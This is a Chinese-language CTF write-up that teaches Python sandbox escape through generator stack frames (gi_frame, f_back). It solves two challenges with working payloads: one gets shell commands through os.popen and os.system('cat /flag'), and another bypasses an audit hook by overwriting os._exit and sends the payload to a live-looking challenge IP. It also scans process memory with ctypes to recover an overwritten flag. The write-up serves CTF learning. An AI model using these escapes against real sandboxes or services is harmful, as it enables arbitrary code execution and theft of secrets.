Pyjail栈帧

19 min

原理

在学习栈帧之前,我们要先掌握python中的生成器这个概念

生成器

普通的python函数,只要开始执行就不会停止一直到遇到return或者代码块结束,这然后个函数的执行环境,局部变量和栈帧都会被销毁,但是生成器的执行逻辑不一样,关键字也不是return而是yield

生成器可以当做一个可以随时停止可继续的函数,当生成器函数执行到yield时,它会将yield后面的数据返回并且保存当前所有的局部变量、指令等等,当再次调用生成器时,会从上次暂停的位置继续执行,直到遇见下一个yield

举个简单的例子

def f():
    a = 1
    while True:
        yield a
        a += 1

f = f()#获得生成器,函数没有被执行
print(next(f))
#1
print(next(f))
#2
print(next(f))
#3

除了用next调用,也可以用for循环遍历生成器当中的数值

def f():
    a = 1
    while a < 6:
        yield a
        a += 1

f = f()
for item in f:
    print(item)
"""
1
2
3
4
5
"""

生成器有一个生成器表达式,类似于列表推导式,不过使用的是圆括号而不是方括号,生成器表达式会在调用的时候逐个生成值,而不是像列表推导式一样一次性全部生成,和普通函数与生成器函数的区别差不多

举个例子

res = []#用for循环遍历
a = (a for a in range(10))
for i in a:
    res.append(i)
print(res)

res = []#用next调用
a = (a for a in range(100))
for i in range(10):#只会调用
    tmp = next(a)
    res.append(tmp)
print(res)

#或者写的简单一点
a = ( a for a in range(10))
print([i for i in a])

#再简单点
a = ( a for a in range(10))
print([*a])

#输出都为: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9]

生成器属性

gi_frame

gi_frame属性返回生成器对象当前的栈帧。通过访问栈帧,可以获取生成器当前执行的代码行号和局部变量等信息。并且生成器必须处于运行状态才能够获取到,如果生成器已经结束了运行或者只创建了还没有被调用,那么栈帧则已经被销毁或者还没有创建,没法用gi_frame获取

gi_code

gi_code属性返回一个代码对象,包含生成器函数的字节码和其他编译时信息。可以通过co_nameco_filename等属性获取更多信息

gi_running

gi_running属性是一个布尔值,表示生成器是否正在运行

也可以用inspect模块,这里就不多介绍了

栈帧属性

在任何一个函数或者方法调用都会创建一个栈帧,函数执行完毕之后这个栈帧就会随着销毁。栈帧中包含着当前函数或者方法的局部变量、参数、指向上一个栈帧的指针等等,栈帧中有下面几个主要的属性:

f_locals: 一个字典,包含当前函数或方法作用域内所有局部变量的

f_globals: 一个字典,包含当前函数或方法所在模块的全局变量

f_builtins: 包含当前的一系列内置函数、内置类、内置异常等等

f_back: 指向上一级栈帧

f_code: 指向当前栈帧对应的代码对象,里面含有字节码、常量表等等

f_lineno/f_lasti: 当前执行到的行号/当前执行到的字节码指令索引

def P():
    a = 1
    b = 2
    yield a
    yield b
    yield 3

P = P()

frame = P.gi_frame

print(f"当前栈帧: {frame}\n")
print(f"局部变量: {frame.f_locals}\n")
print(f"全局变量: {frame.f_globals}\n")
print(f"builtins: {frame.f_builtins}")

栈帧沙箱逃逸

Pyjail中我们的命令都是在一个被限制的沙箱中执行的,而这个沙箱就是一个栈帧,里面所包含的对象是被处理过的,一般没办法使用函数,那么如何利用栈帧在不适用函数的情况下实现rce呢?

根据前面了解到知道任何一个函数或者方法调用都会创建一个栈帧,根据后进后出的规则排序,题目在创建沙箱的时候也是如此,拿下面的例子来说明,在运行这段代码的时候,main()作为入口,然后调用func_A->func_B,在进入func_B之后,我们查看一下栈帧的顺序就能够明白了,首先最先调用main()先入栈,然后是func_A,最后是func_B

import sys
def func_B():
    f = sys._getframe()
    print(f"当前栈帧(最顶层): {f.f_code.co_name}")
    print(f"上一级(f_back): {f.f_back.f_code.co_name}")
    print(f"再上一级(f_back.f_back): {f.f_back.f_back.f_code.co_name}")

def func_A():
    func_B()

def main():
    func_A()

if __name__ == "__main__":
    main()
    
#当前栈帧 (最顶层): func_B
#上一级 (f_back):   func_A
#再上一级 (f_back.f_back): main

在题目当中,会用exec来创造沙箱环境,如下面这个例子,我们的命令是在exec中被执行的。脚本启动后的环境调用了exec,然后exec调用我们写的payload,和刚才的例子作比较就是

初始环境—>main

exec—>func_A

payload—>func_B

paylaod = ""#我们可控的地方

safe_builtins = {
    'dict':dict,
    'list':list,
}

exec(payload, safe_builtins)#执行命令

结合上面的分析,理一下rce的思路

获取当前的栈帧 -> 返回上一级也就是初始环境的栈帧 -> 拿到完整的builtins然后实现rce

gi_frame能够获取当前生成器的栈帧

在获取之后用f_back逃逸到之前的栈帧实现rce

一个简单的例子:

payload = "" # <-----可控


safe_builtins = {"__builtins__": None}
exec(payload, safe_builtins)

根据上面的分析,可以得到payload如下

def f():
    yield g.gi_frame.f_back.f_back
g = f()
frame = next(g)
frame = g.send(None)
frame = [ x for x in g ][0]
frame = [*g][0]
##如果沙箱中没有next的话第一个就用不了
#------------------------------
#这样也可以,更简洁一点
g = (g.gi_frame.f_back.f_back for _ in [1])
frame = [*g][0]
#------------------------------
#也可以直接这样
frame = [f.f_back.f_back for f in [g.gi_frame for g in [(lambda: (yield))()] if [g.send(None)]]][0]
#------------------------------
b = frame.f_globals['__builtins__']
b.print(b.__import__('os').popen('whoami').read())

解释一下payload的构造方式

def f():
    yield g.gi_frame.f_back.f_back
g = f()
##frame = next(g)
##frame = g.send(None)
##frame = [ x for x in g ][0]
frame = [*g][0]

没什么好说的

g = (g.gi_frame.f_back.f_back for _ in [1])
frame = [*g][0]

通过生成器的特性,只有被调用时会触发生成器表达式内的代码,因此在将[*g]赋给frame的时候才开始执行,在此之前g已经是一个生成器的对象了,在[*g]中的*是解包操作符,会将g中的所有数据提取出来,这时就会触发遍历,从而执行获取栈帧的操作

frame = [f.f_back.f_back for f in [g.gi_frame for g in [(lambda: (yield))()] if [g.send(None)]]][0]

#全部拆开就是下面的这个形式(应该没写错)
P = [(lambda : (yield))()]

R = []
for g in P:
    if [g.send(None)]:
        R.append(g.gi_frame)
        
res = []
for f in frame:
    res.append(f.f_back.f_back)

frame = res[0]

这一个只有在比较新的python版本中才能用,不是很建议用这个

[(lambda:(yield))()]

  • 定义了一个匿名函数lambda:(yield),然后通过...()直接调用了这个匿名函数并放入一个列表中[...]

[g.g_frame for g in [...] if [g.send(None)]]

  • if [g.send(None)]中,涉及到send()这个函数的作用,用send调用一个生成器时,如果yield没有返回值则返回send()中的参数,也就是会变成if [None]。在列表推导式中,会先进行判断再执行前面的代码,因此利用这个if判断在用for遍历前启动了这个生成器,所以[g.g_frame for g in [...] ...]能够获取到当前的栈帧然后放入这个列表中

[f.f_back.f_back for f in [...]][0]

  • 这里就是利用f_back进行栈帧逃逸到初始环境当中

tips

在3.12以前,列表推导式相当于一个临时的匿名函数,会在调用栈中多插入一层,而列表解包是一个语法糖,不会创建新的栈帧,隐藏前者在创建时的栈帧会深一层

PEP 709

总结一下,其实再看还是很简单的,逃逸的操作很简单,有关属性基本就用到了gi_framef_back然后想办法触发这个生成器

在学习的时候看到几道题目很有意思,也记录一下

题目

第九届中国海洋大学信息安全竞赛 菜狗工具#2

参考文章

源码

from flask import *
import io
import time

app = Flask(__name__)
black_list = [
    '__build_class__', '__debug__', '__doc__', '__import__', 
    '__loader__', '__name__', '__package__', '__spec__', 'SystemExit',
    'breakpoint', 'compile', 'exit', 'memoryview', 'open', 'quit', 'input'
]
new_builtins = dict([
    (key, val) for key, val in __builtins__.__dict__.items() if key not in black_list
])

flag = "flag{xxxxxx}"
flag = "DISPOSED"

@app.route("/")
def index():
    return redirect("/static/index.html")

@app.post("/run")
def run():
    out = io.StringIO()
    script = str(request.form["script"])
    
    def wrap_print(*args, **kwargs):
        kwargs["file"] = out
        print(*args, **kwargs)
    new_builtins["print"] = wrap_print

    try:
        exec(script, {"__builtins__": new_builtins})
    except Exception as e:
        wrap_print(e)
    
    ret = out.getvalue()
    out.close()
    return ret

time.sleep(5) # current source file is deleted
app.run('0.0.0.0', port=9001)

题目是沙箱逃逸,用继承链也可以打,但是在学习栈帧逃逸就不用继承链了

在运行完之后源码会删除,环境变量和文件中都没有flag了

参考文章中的方法是获取地址暴力扫描。因为flag是创建之后被覆盖了,所以原本的flag和覆盖后的字符在内存中的位置相差不远,在找到被覆盖后的”DISPOSED”,再从这个地址往回并查找地址内容就能够找到原本的flag

首先利用globals获取全局变量,拿到flag的地址,用ctypes.cast把获取到的地址强制转换成c语言的字符型指针(c_char_p),从而通过value读取这个地址的内容

在64位的系统中,内存地址一般是8字节对齐的,所以每次循环的步长为8

payload

g = (g.gi_frame.f_back.f_back for _ in [1])
frame = [*g][0]

b = frame.f_globals
ctypes = b['__builtins__'].__import__('ctypes')
flag_addr = id(b['flag'])

for i in range(10000):
	txt = ctypes.cast((flag_addr-i*8), ctypes.c_char_p).value
	if b"FLAG{" in txt:
		print(txt)

官方的wp

sys = print.__globals__["__builtins__"].__import__('sys')
io = print.__globals__["__builtins__"].__import__('io')
dis = print.__globals__["__builtins__"].__import__('dis')
threading = print.__globals__["__builtins__"].__import__('threading')

frame = sys._current_frames()[threading.main_thread().ident]

while frame is not None:
	out = io.StringIO()
	dis.dis(frame.f_code,file=out)
	content = out.getvalue()
	out.close()
	print(content)
	frame = frame.f_back

直接获取到主线程的内存然后反编译

gc

gc(Garbage Collector,垃圾回收器),gc里面包含着内容中所有的东西(列表、字典、字符串、栈帧、函数…)

通过gc.get_objects()获取所有的对象,这时只要还留存在内存中的数据都能够被找到,但是这里要注意python的”引用计数”机制,如果计数器归零了就会在内存中被删除,这个对象也就彻底消失了

_Pyjail栈帧-1

mossfern[CSICN 2024]

main.py

import os
import subprocess
from flask import Flask, request, jsonify
from uuid import uuid1

app = Flask(__name__)

runner = open("/app/runner.py", "r", encoding="UTF-8").read()
flag = open("/flag", "r", encoding="UTF-8").readline().strip()


@app.post("/run")
def run():
    id = str(uuid1())
    try:
        data = request.json
        open(f"/app/uploads/{id}.py", "w", encoding="UTF-8").write(
            runner.replace("THIS_IS_SEED", flag).replace("THIS_IS_TASK_RANDOM_ID", id))
        open(f"/app/uploads/{id}.txt", "w", encoding="UTF-8").write(data.get("code", ""))
        run = subprocess.run(
            ['python', f"/app/uploads/{id}.py"],
            stdout=subprocess.PIPE,
            stderr=subprocess.PIPE,
            timeout=3
        )
        result = run.stdout.decode("utf-8")
        error = run.stderr.decode("utf-8")
        print(result, error)


        if os.path.exists(f"/app/uploads/{id}.py"):
            os.remove(f"/app/uploads/{id}.py")
        if os.path.exists(f"/app/uploads/{id}.txt"):
            os.remove(f"/app/uploads/{id}.txt")
        return jsonify({
            "result": f"{result}\n{error}"
        })
    except:
        if os.path.exists(f"/app/uploads/{id}.py"):
            os.remove(f"/app/uploads/{id}.py")
        if os.path.exists(f"/app/uploads/{id}.txt"):
            os.remove(f"/app/uploads/{id}.txt")
        return jsonify({
            "result": "None"
        })


if __name__ == "__main__":
    app.run("0.0.0.0", 5000)

runner.py

def source_simple_check(source):

    """
    Check the source with pure string in string, prevent dangerous strings
    :param source: source code
    :return: None
    """

    from sys import exit
    from builtins import print

    try:
        source.encode("ascii")
    except UnicodeEncodeError:
        print("non-ascii is not permitted")
        exit()

    for i in ["__", "getattr", "exit"]:
        if i in source.lower():
            print(i)
            exit()


def block_wrapper():
    """
    Check the run process with sys.audithook, no dangerous operations should be conduct
    :return: None
    """

    def audit(event, args):

        from builtins import str, print
        import os

        for i in ["marshal", "__new__", "process", "os", "sys", "interpreter", "cpython", "open", "compile", "gc"]:
            if i in (event + "".join(str(s) for s in args)).lower():
                print(i)
                os._exit(1)
    return audit


def source_opcode_checker(code):
    """
    Check the source in the bytecode aspect, no methods and globals should be load
    :param code: source code
    :return: None
    """

    from dis import dis
    from builtins import str
    from io import StringIO
    from sys import exit

    opcodeIO = StringIO()
    dis(code, file=opcodeIO)
    opcode = opcodeIO.getvalue().split("\n")
    opcodeIO.close()
    for line in opcode:
        if any(x in str(line) for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"]):
            if any(x in str(line) for x in ["randint", "randrange", "print", "seed"]):
                break
            print("".join([x for x in ["LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD"] if x in str(line)]))
            exit()


if __name__ == "__main__":

    from builtins import open
    from sys import addaudithook
    from contextlib import redirect_stdout
    from random import randint, randrange, seed
    from io import StringIO
    from random import seed
    from time import time

    source = open(f"/app/uploads/THIS_IS_TASK_RANDOM_ID.txt", "r").read()
    source_simple_check(source)
    source_opcode_checker(source)
    code = compile(source, "<sandbox>", "exec")
    addaudithook(block_wrapper())
    outputIO = StringIO()
    with redirect_stdout(outputIO):
        seed(str(time()) + "THIS_IS_SEED" + str(time()))
        exec(code, {
            "__builtins__": None,
            "randint": randint,
            "randrange": randrange,
            "seed": seed,
            "print": print
        }, None)
    output = outputIO.getvalue()

    if "THIS_IS_SEED" in output:
        print("这 runtime 你就嘎嘎写吧, 一写一个不吱声啊,点儿都没拦住!")
        print("bad code-operation why still happened ah?")
    else:
        print(output)

分析一下

source_simple_check

检查是否是ascii码的形式,不能含有--getattrexit

source_opcode_checker

将源码编译成字节码,检测"LOAD_GLOBAL", "IMPORT_NAME", "LOAD_METHOD",并且字符串中必须含有"randint", "randrange", "print", "seed"之一

hook

设置审计钩子,不允许使用"marshal", "__new__", "process", "os", "sys", "interpreter", "cpython", "open", "compile", "gc"

在source_opcode_checker中,在对字符串检测时,匹配到白名单中的字符会触发break导致跳出循环,从而就绕过了对”LOAD_GLOBAL”, “IMPORT_NAME”, “LOAD_METHOD”的检测。

只要在开头触发一次break就能跳过对后续字符的检测,然后就可以利用栈帧逃逸到沙箱外,但是该怎么读flag呢

上面提到过f_code指向当前栈帧对应的代码对象,里面含有字节码、常量表等等。在seed(str(time()) + "THIS_IS_SEED" + str(time()))这个位置,“THIS_IS_SEED”被替换为了flag,从而保存在了当前栈帧的常量池中,于是就可以通过读取常量池来获取flag,也就在f_code的co_consts中,不过在最后对输出的值进行了检测,需要加上一个分隔符来绕过这个检测

(randint.gi_frame for _ in [1])
a = (a.gi_frame.f_back.f_back for i in [1])
frame = [*a][0]

g = frame.f_globals
b = g['_'+'_builtins_'+'_']

code = frame.f_code
str = b.str
for i in str(code.co_consts):
    print(i,end = " ")

_Pyjail栈帧-2

还看到一个解法,覆写函数来绕过的addaudithook

源码中在检测"marshal", "__new__", "process", "os", "sys", "interpreter", "cpython", "open", "compile", "gc"时是用的os._exit(1)来结束进程的,也就是只要我们能够将os._exit()覆写掉,就算被检测到也会继续进行,但是os._exit中的os是在函数内部重新导入的,我们从exec逃逸能够逃逸到runner.py环境中但是没法进入block_wrapper()之中,也就没法直接覆写

真的没办法了吗?

注意到,在block_wrapper()中除了重新导入了os,还从builtins中导入了str和print,而这里的builtins正是我们能够逃逸到的runner.py中的builtins,那么我们就能够污染print,但是污染了print后改怎么覆写_exit

print是在block_wrapper()中执行的,此时print的上一级栈帧就是block_wrapper()的环境,那么就可以从print逃逸到上一级然后覆盖其中的os._exit

覆盖完成之后利用eval拼接来rce

import requests

url = "http://124.221.168.69:20008/run"

payload_code = """
(randint for _ in [1])
a = (a.gi_frame.f_back.f_back for i in [1])
frame = [*a][0]
b = frame.f_globals['_'+'_builtins_'+'_']

or_print = b.print

def fake(Pr0):
    a = (a.gi_frame.f_back.f_back for i in [1])
    frame = [*a][0]
    l = frame.f_locals
    if 'os' in l:
        b.setattr(l['os'], '_ex'+'it', print)
    print("success")

b.print = fake
eval = b.eval
get = eval('b.get''attr', {'b': b})
impor = get(b, '_''_import_''_')
system = impor('os').system
system('cat /flag')
"""

response = requests.post(url, json={"code": payload_code})
print(response.text)

在这个hook中过滤了gc,现在绕过了,想到能不能用gc读到flag呢

改了好久也没读到,放弃了

在mossfen这道题里面用到了一个读常量池的方法,然后我想到第一个题能不能用这个方法读取呢

答案是不行

在第一题中flag是在run()环境外部的一个变量,没法通过栈帧逃逸到相应的环境,所以没法用f_code拿到

总结

栈帧逃逸就是一个小知识点,方法一看就会,写也很简单,但是实际到了题目中再加加其他的东西结合一下难度就会提升很多,以后琢磨琢磨还能怎么考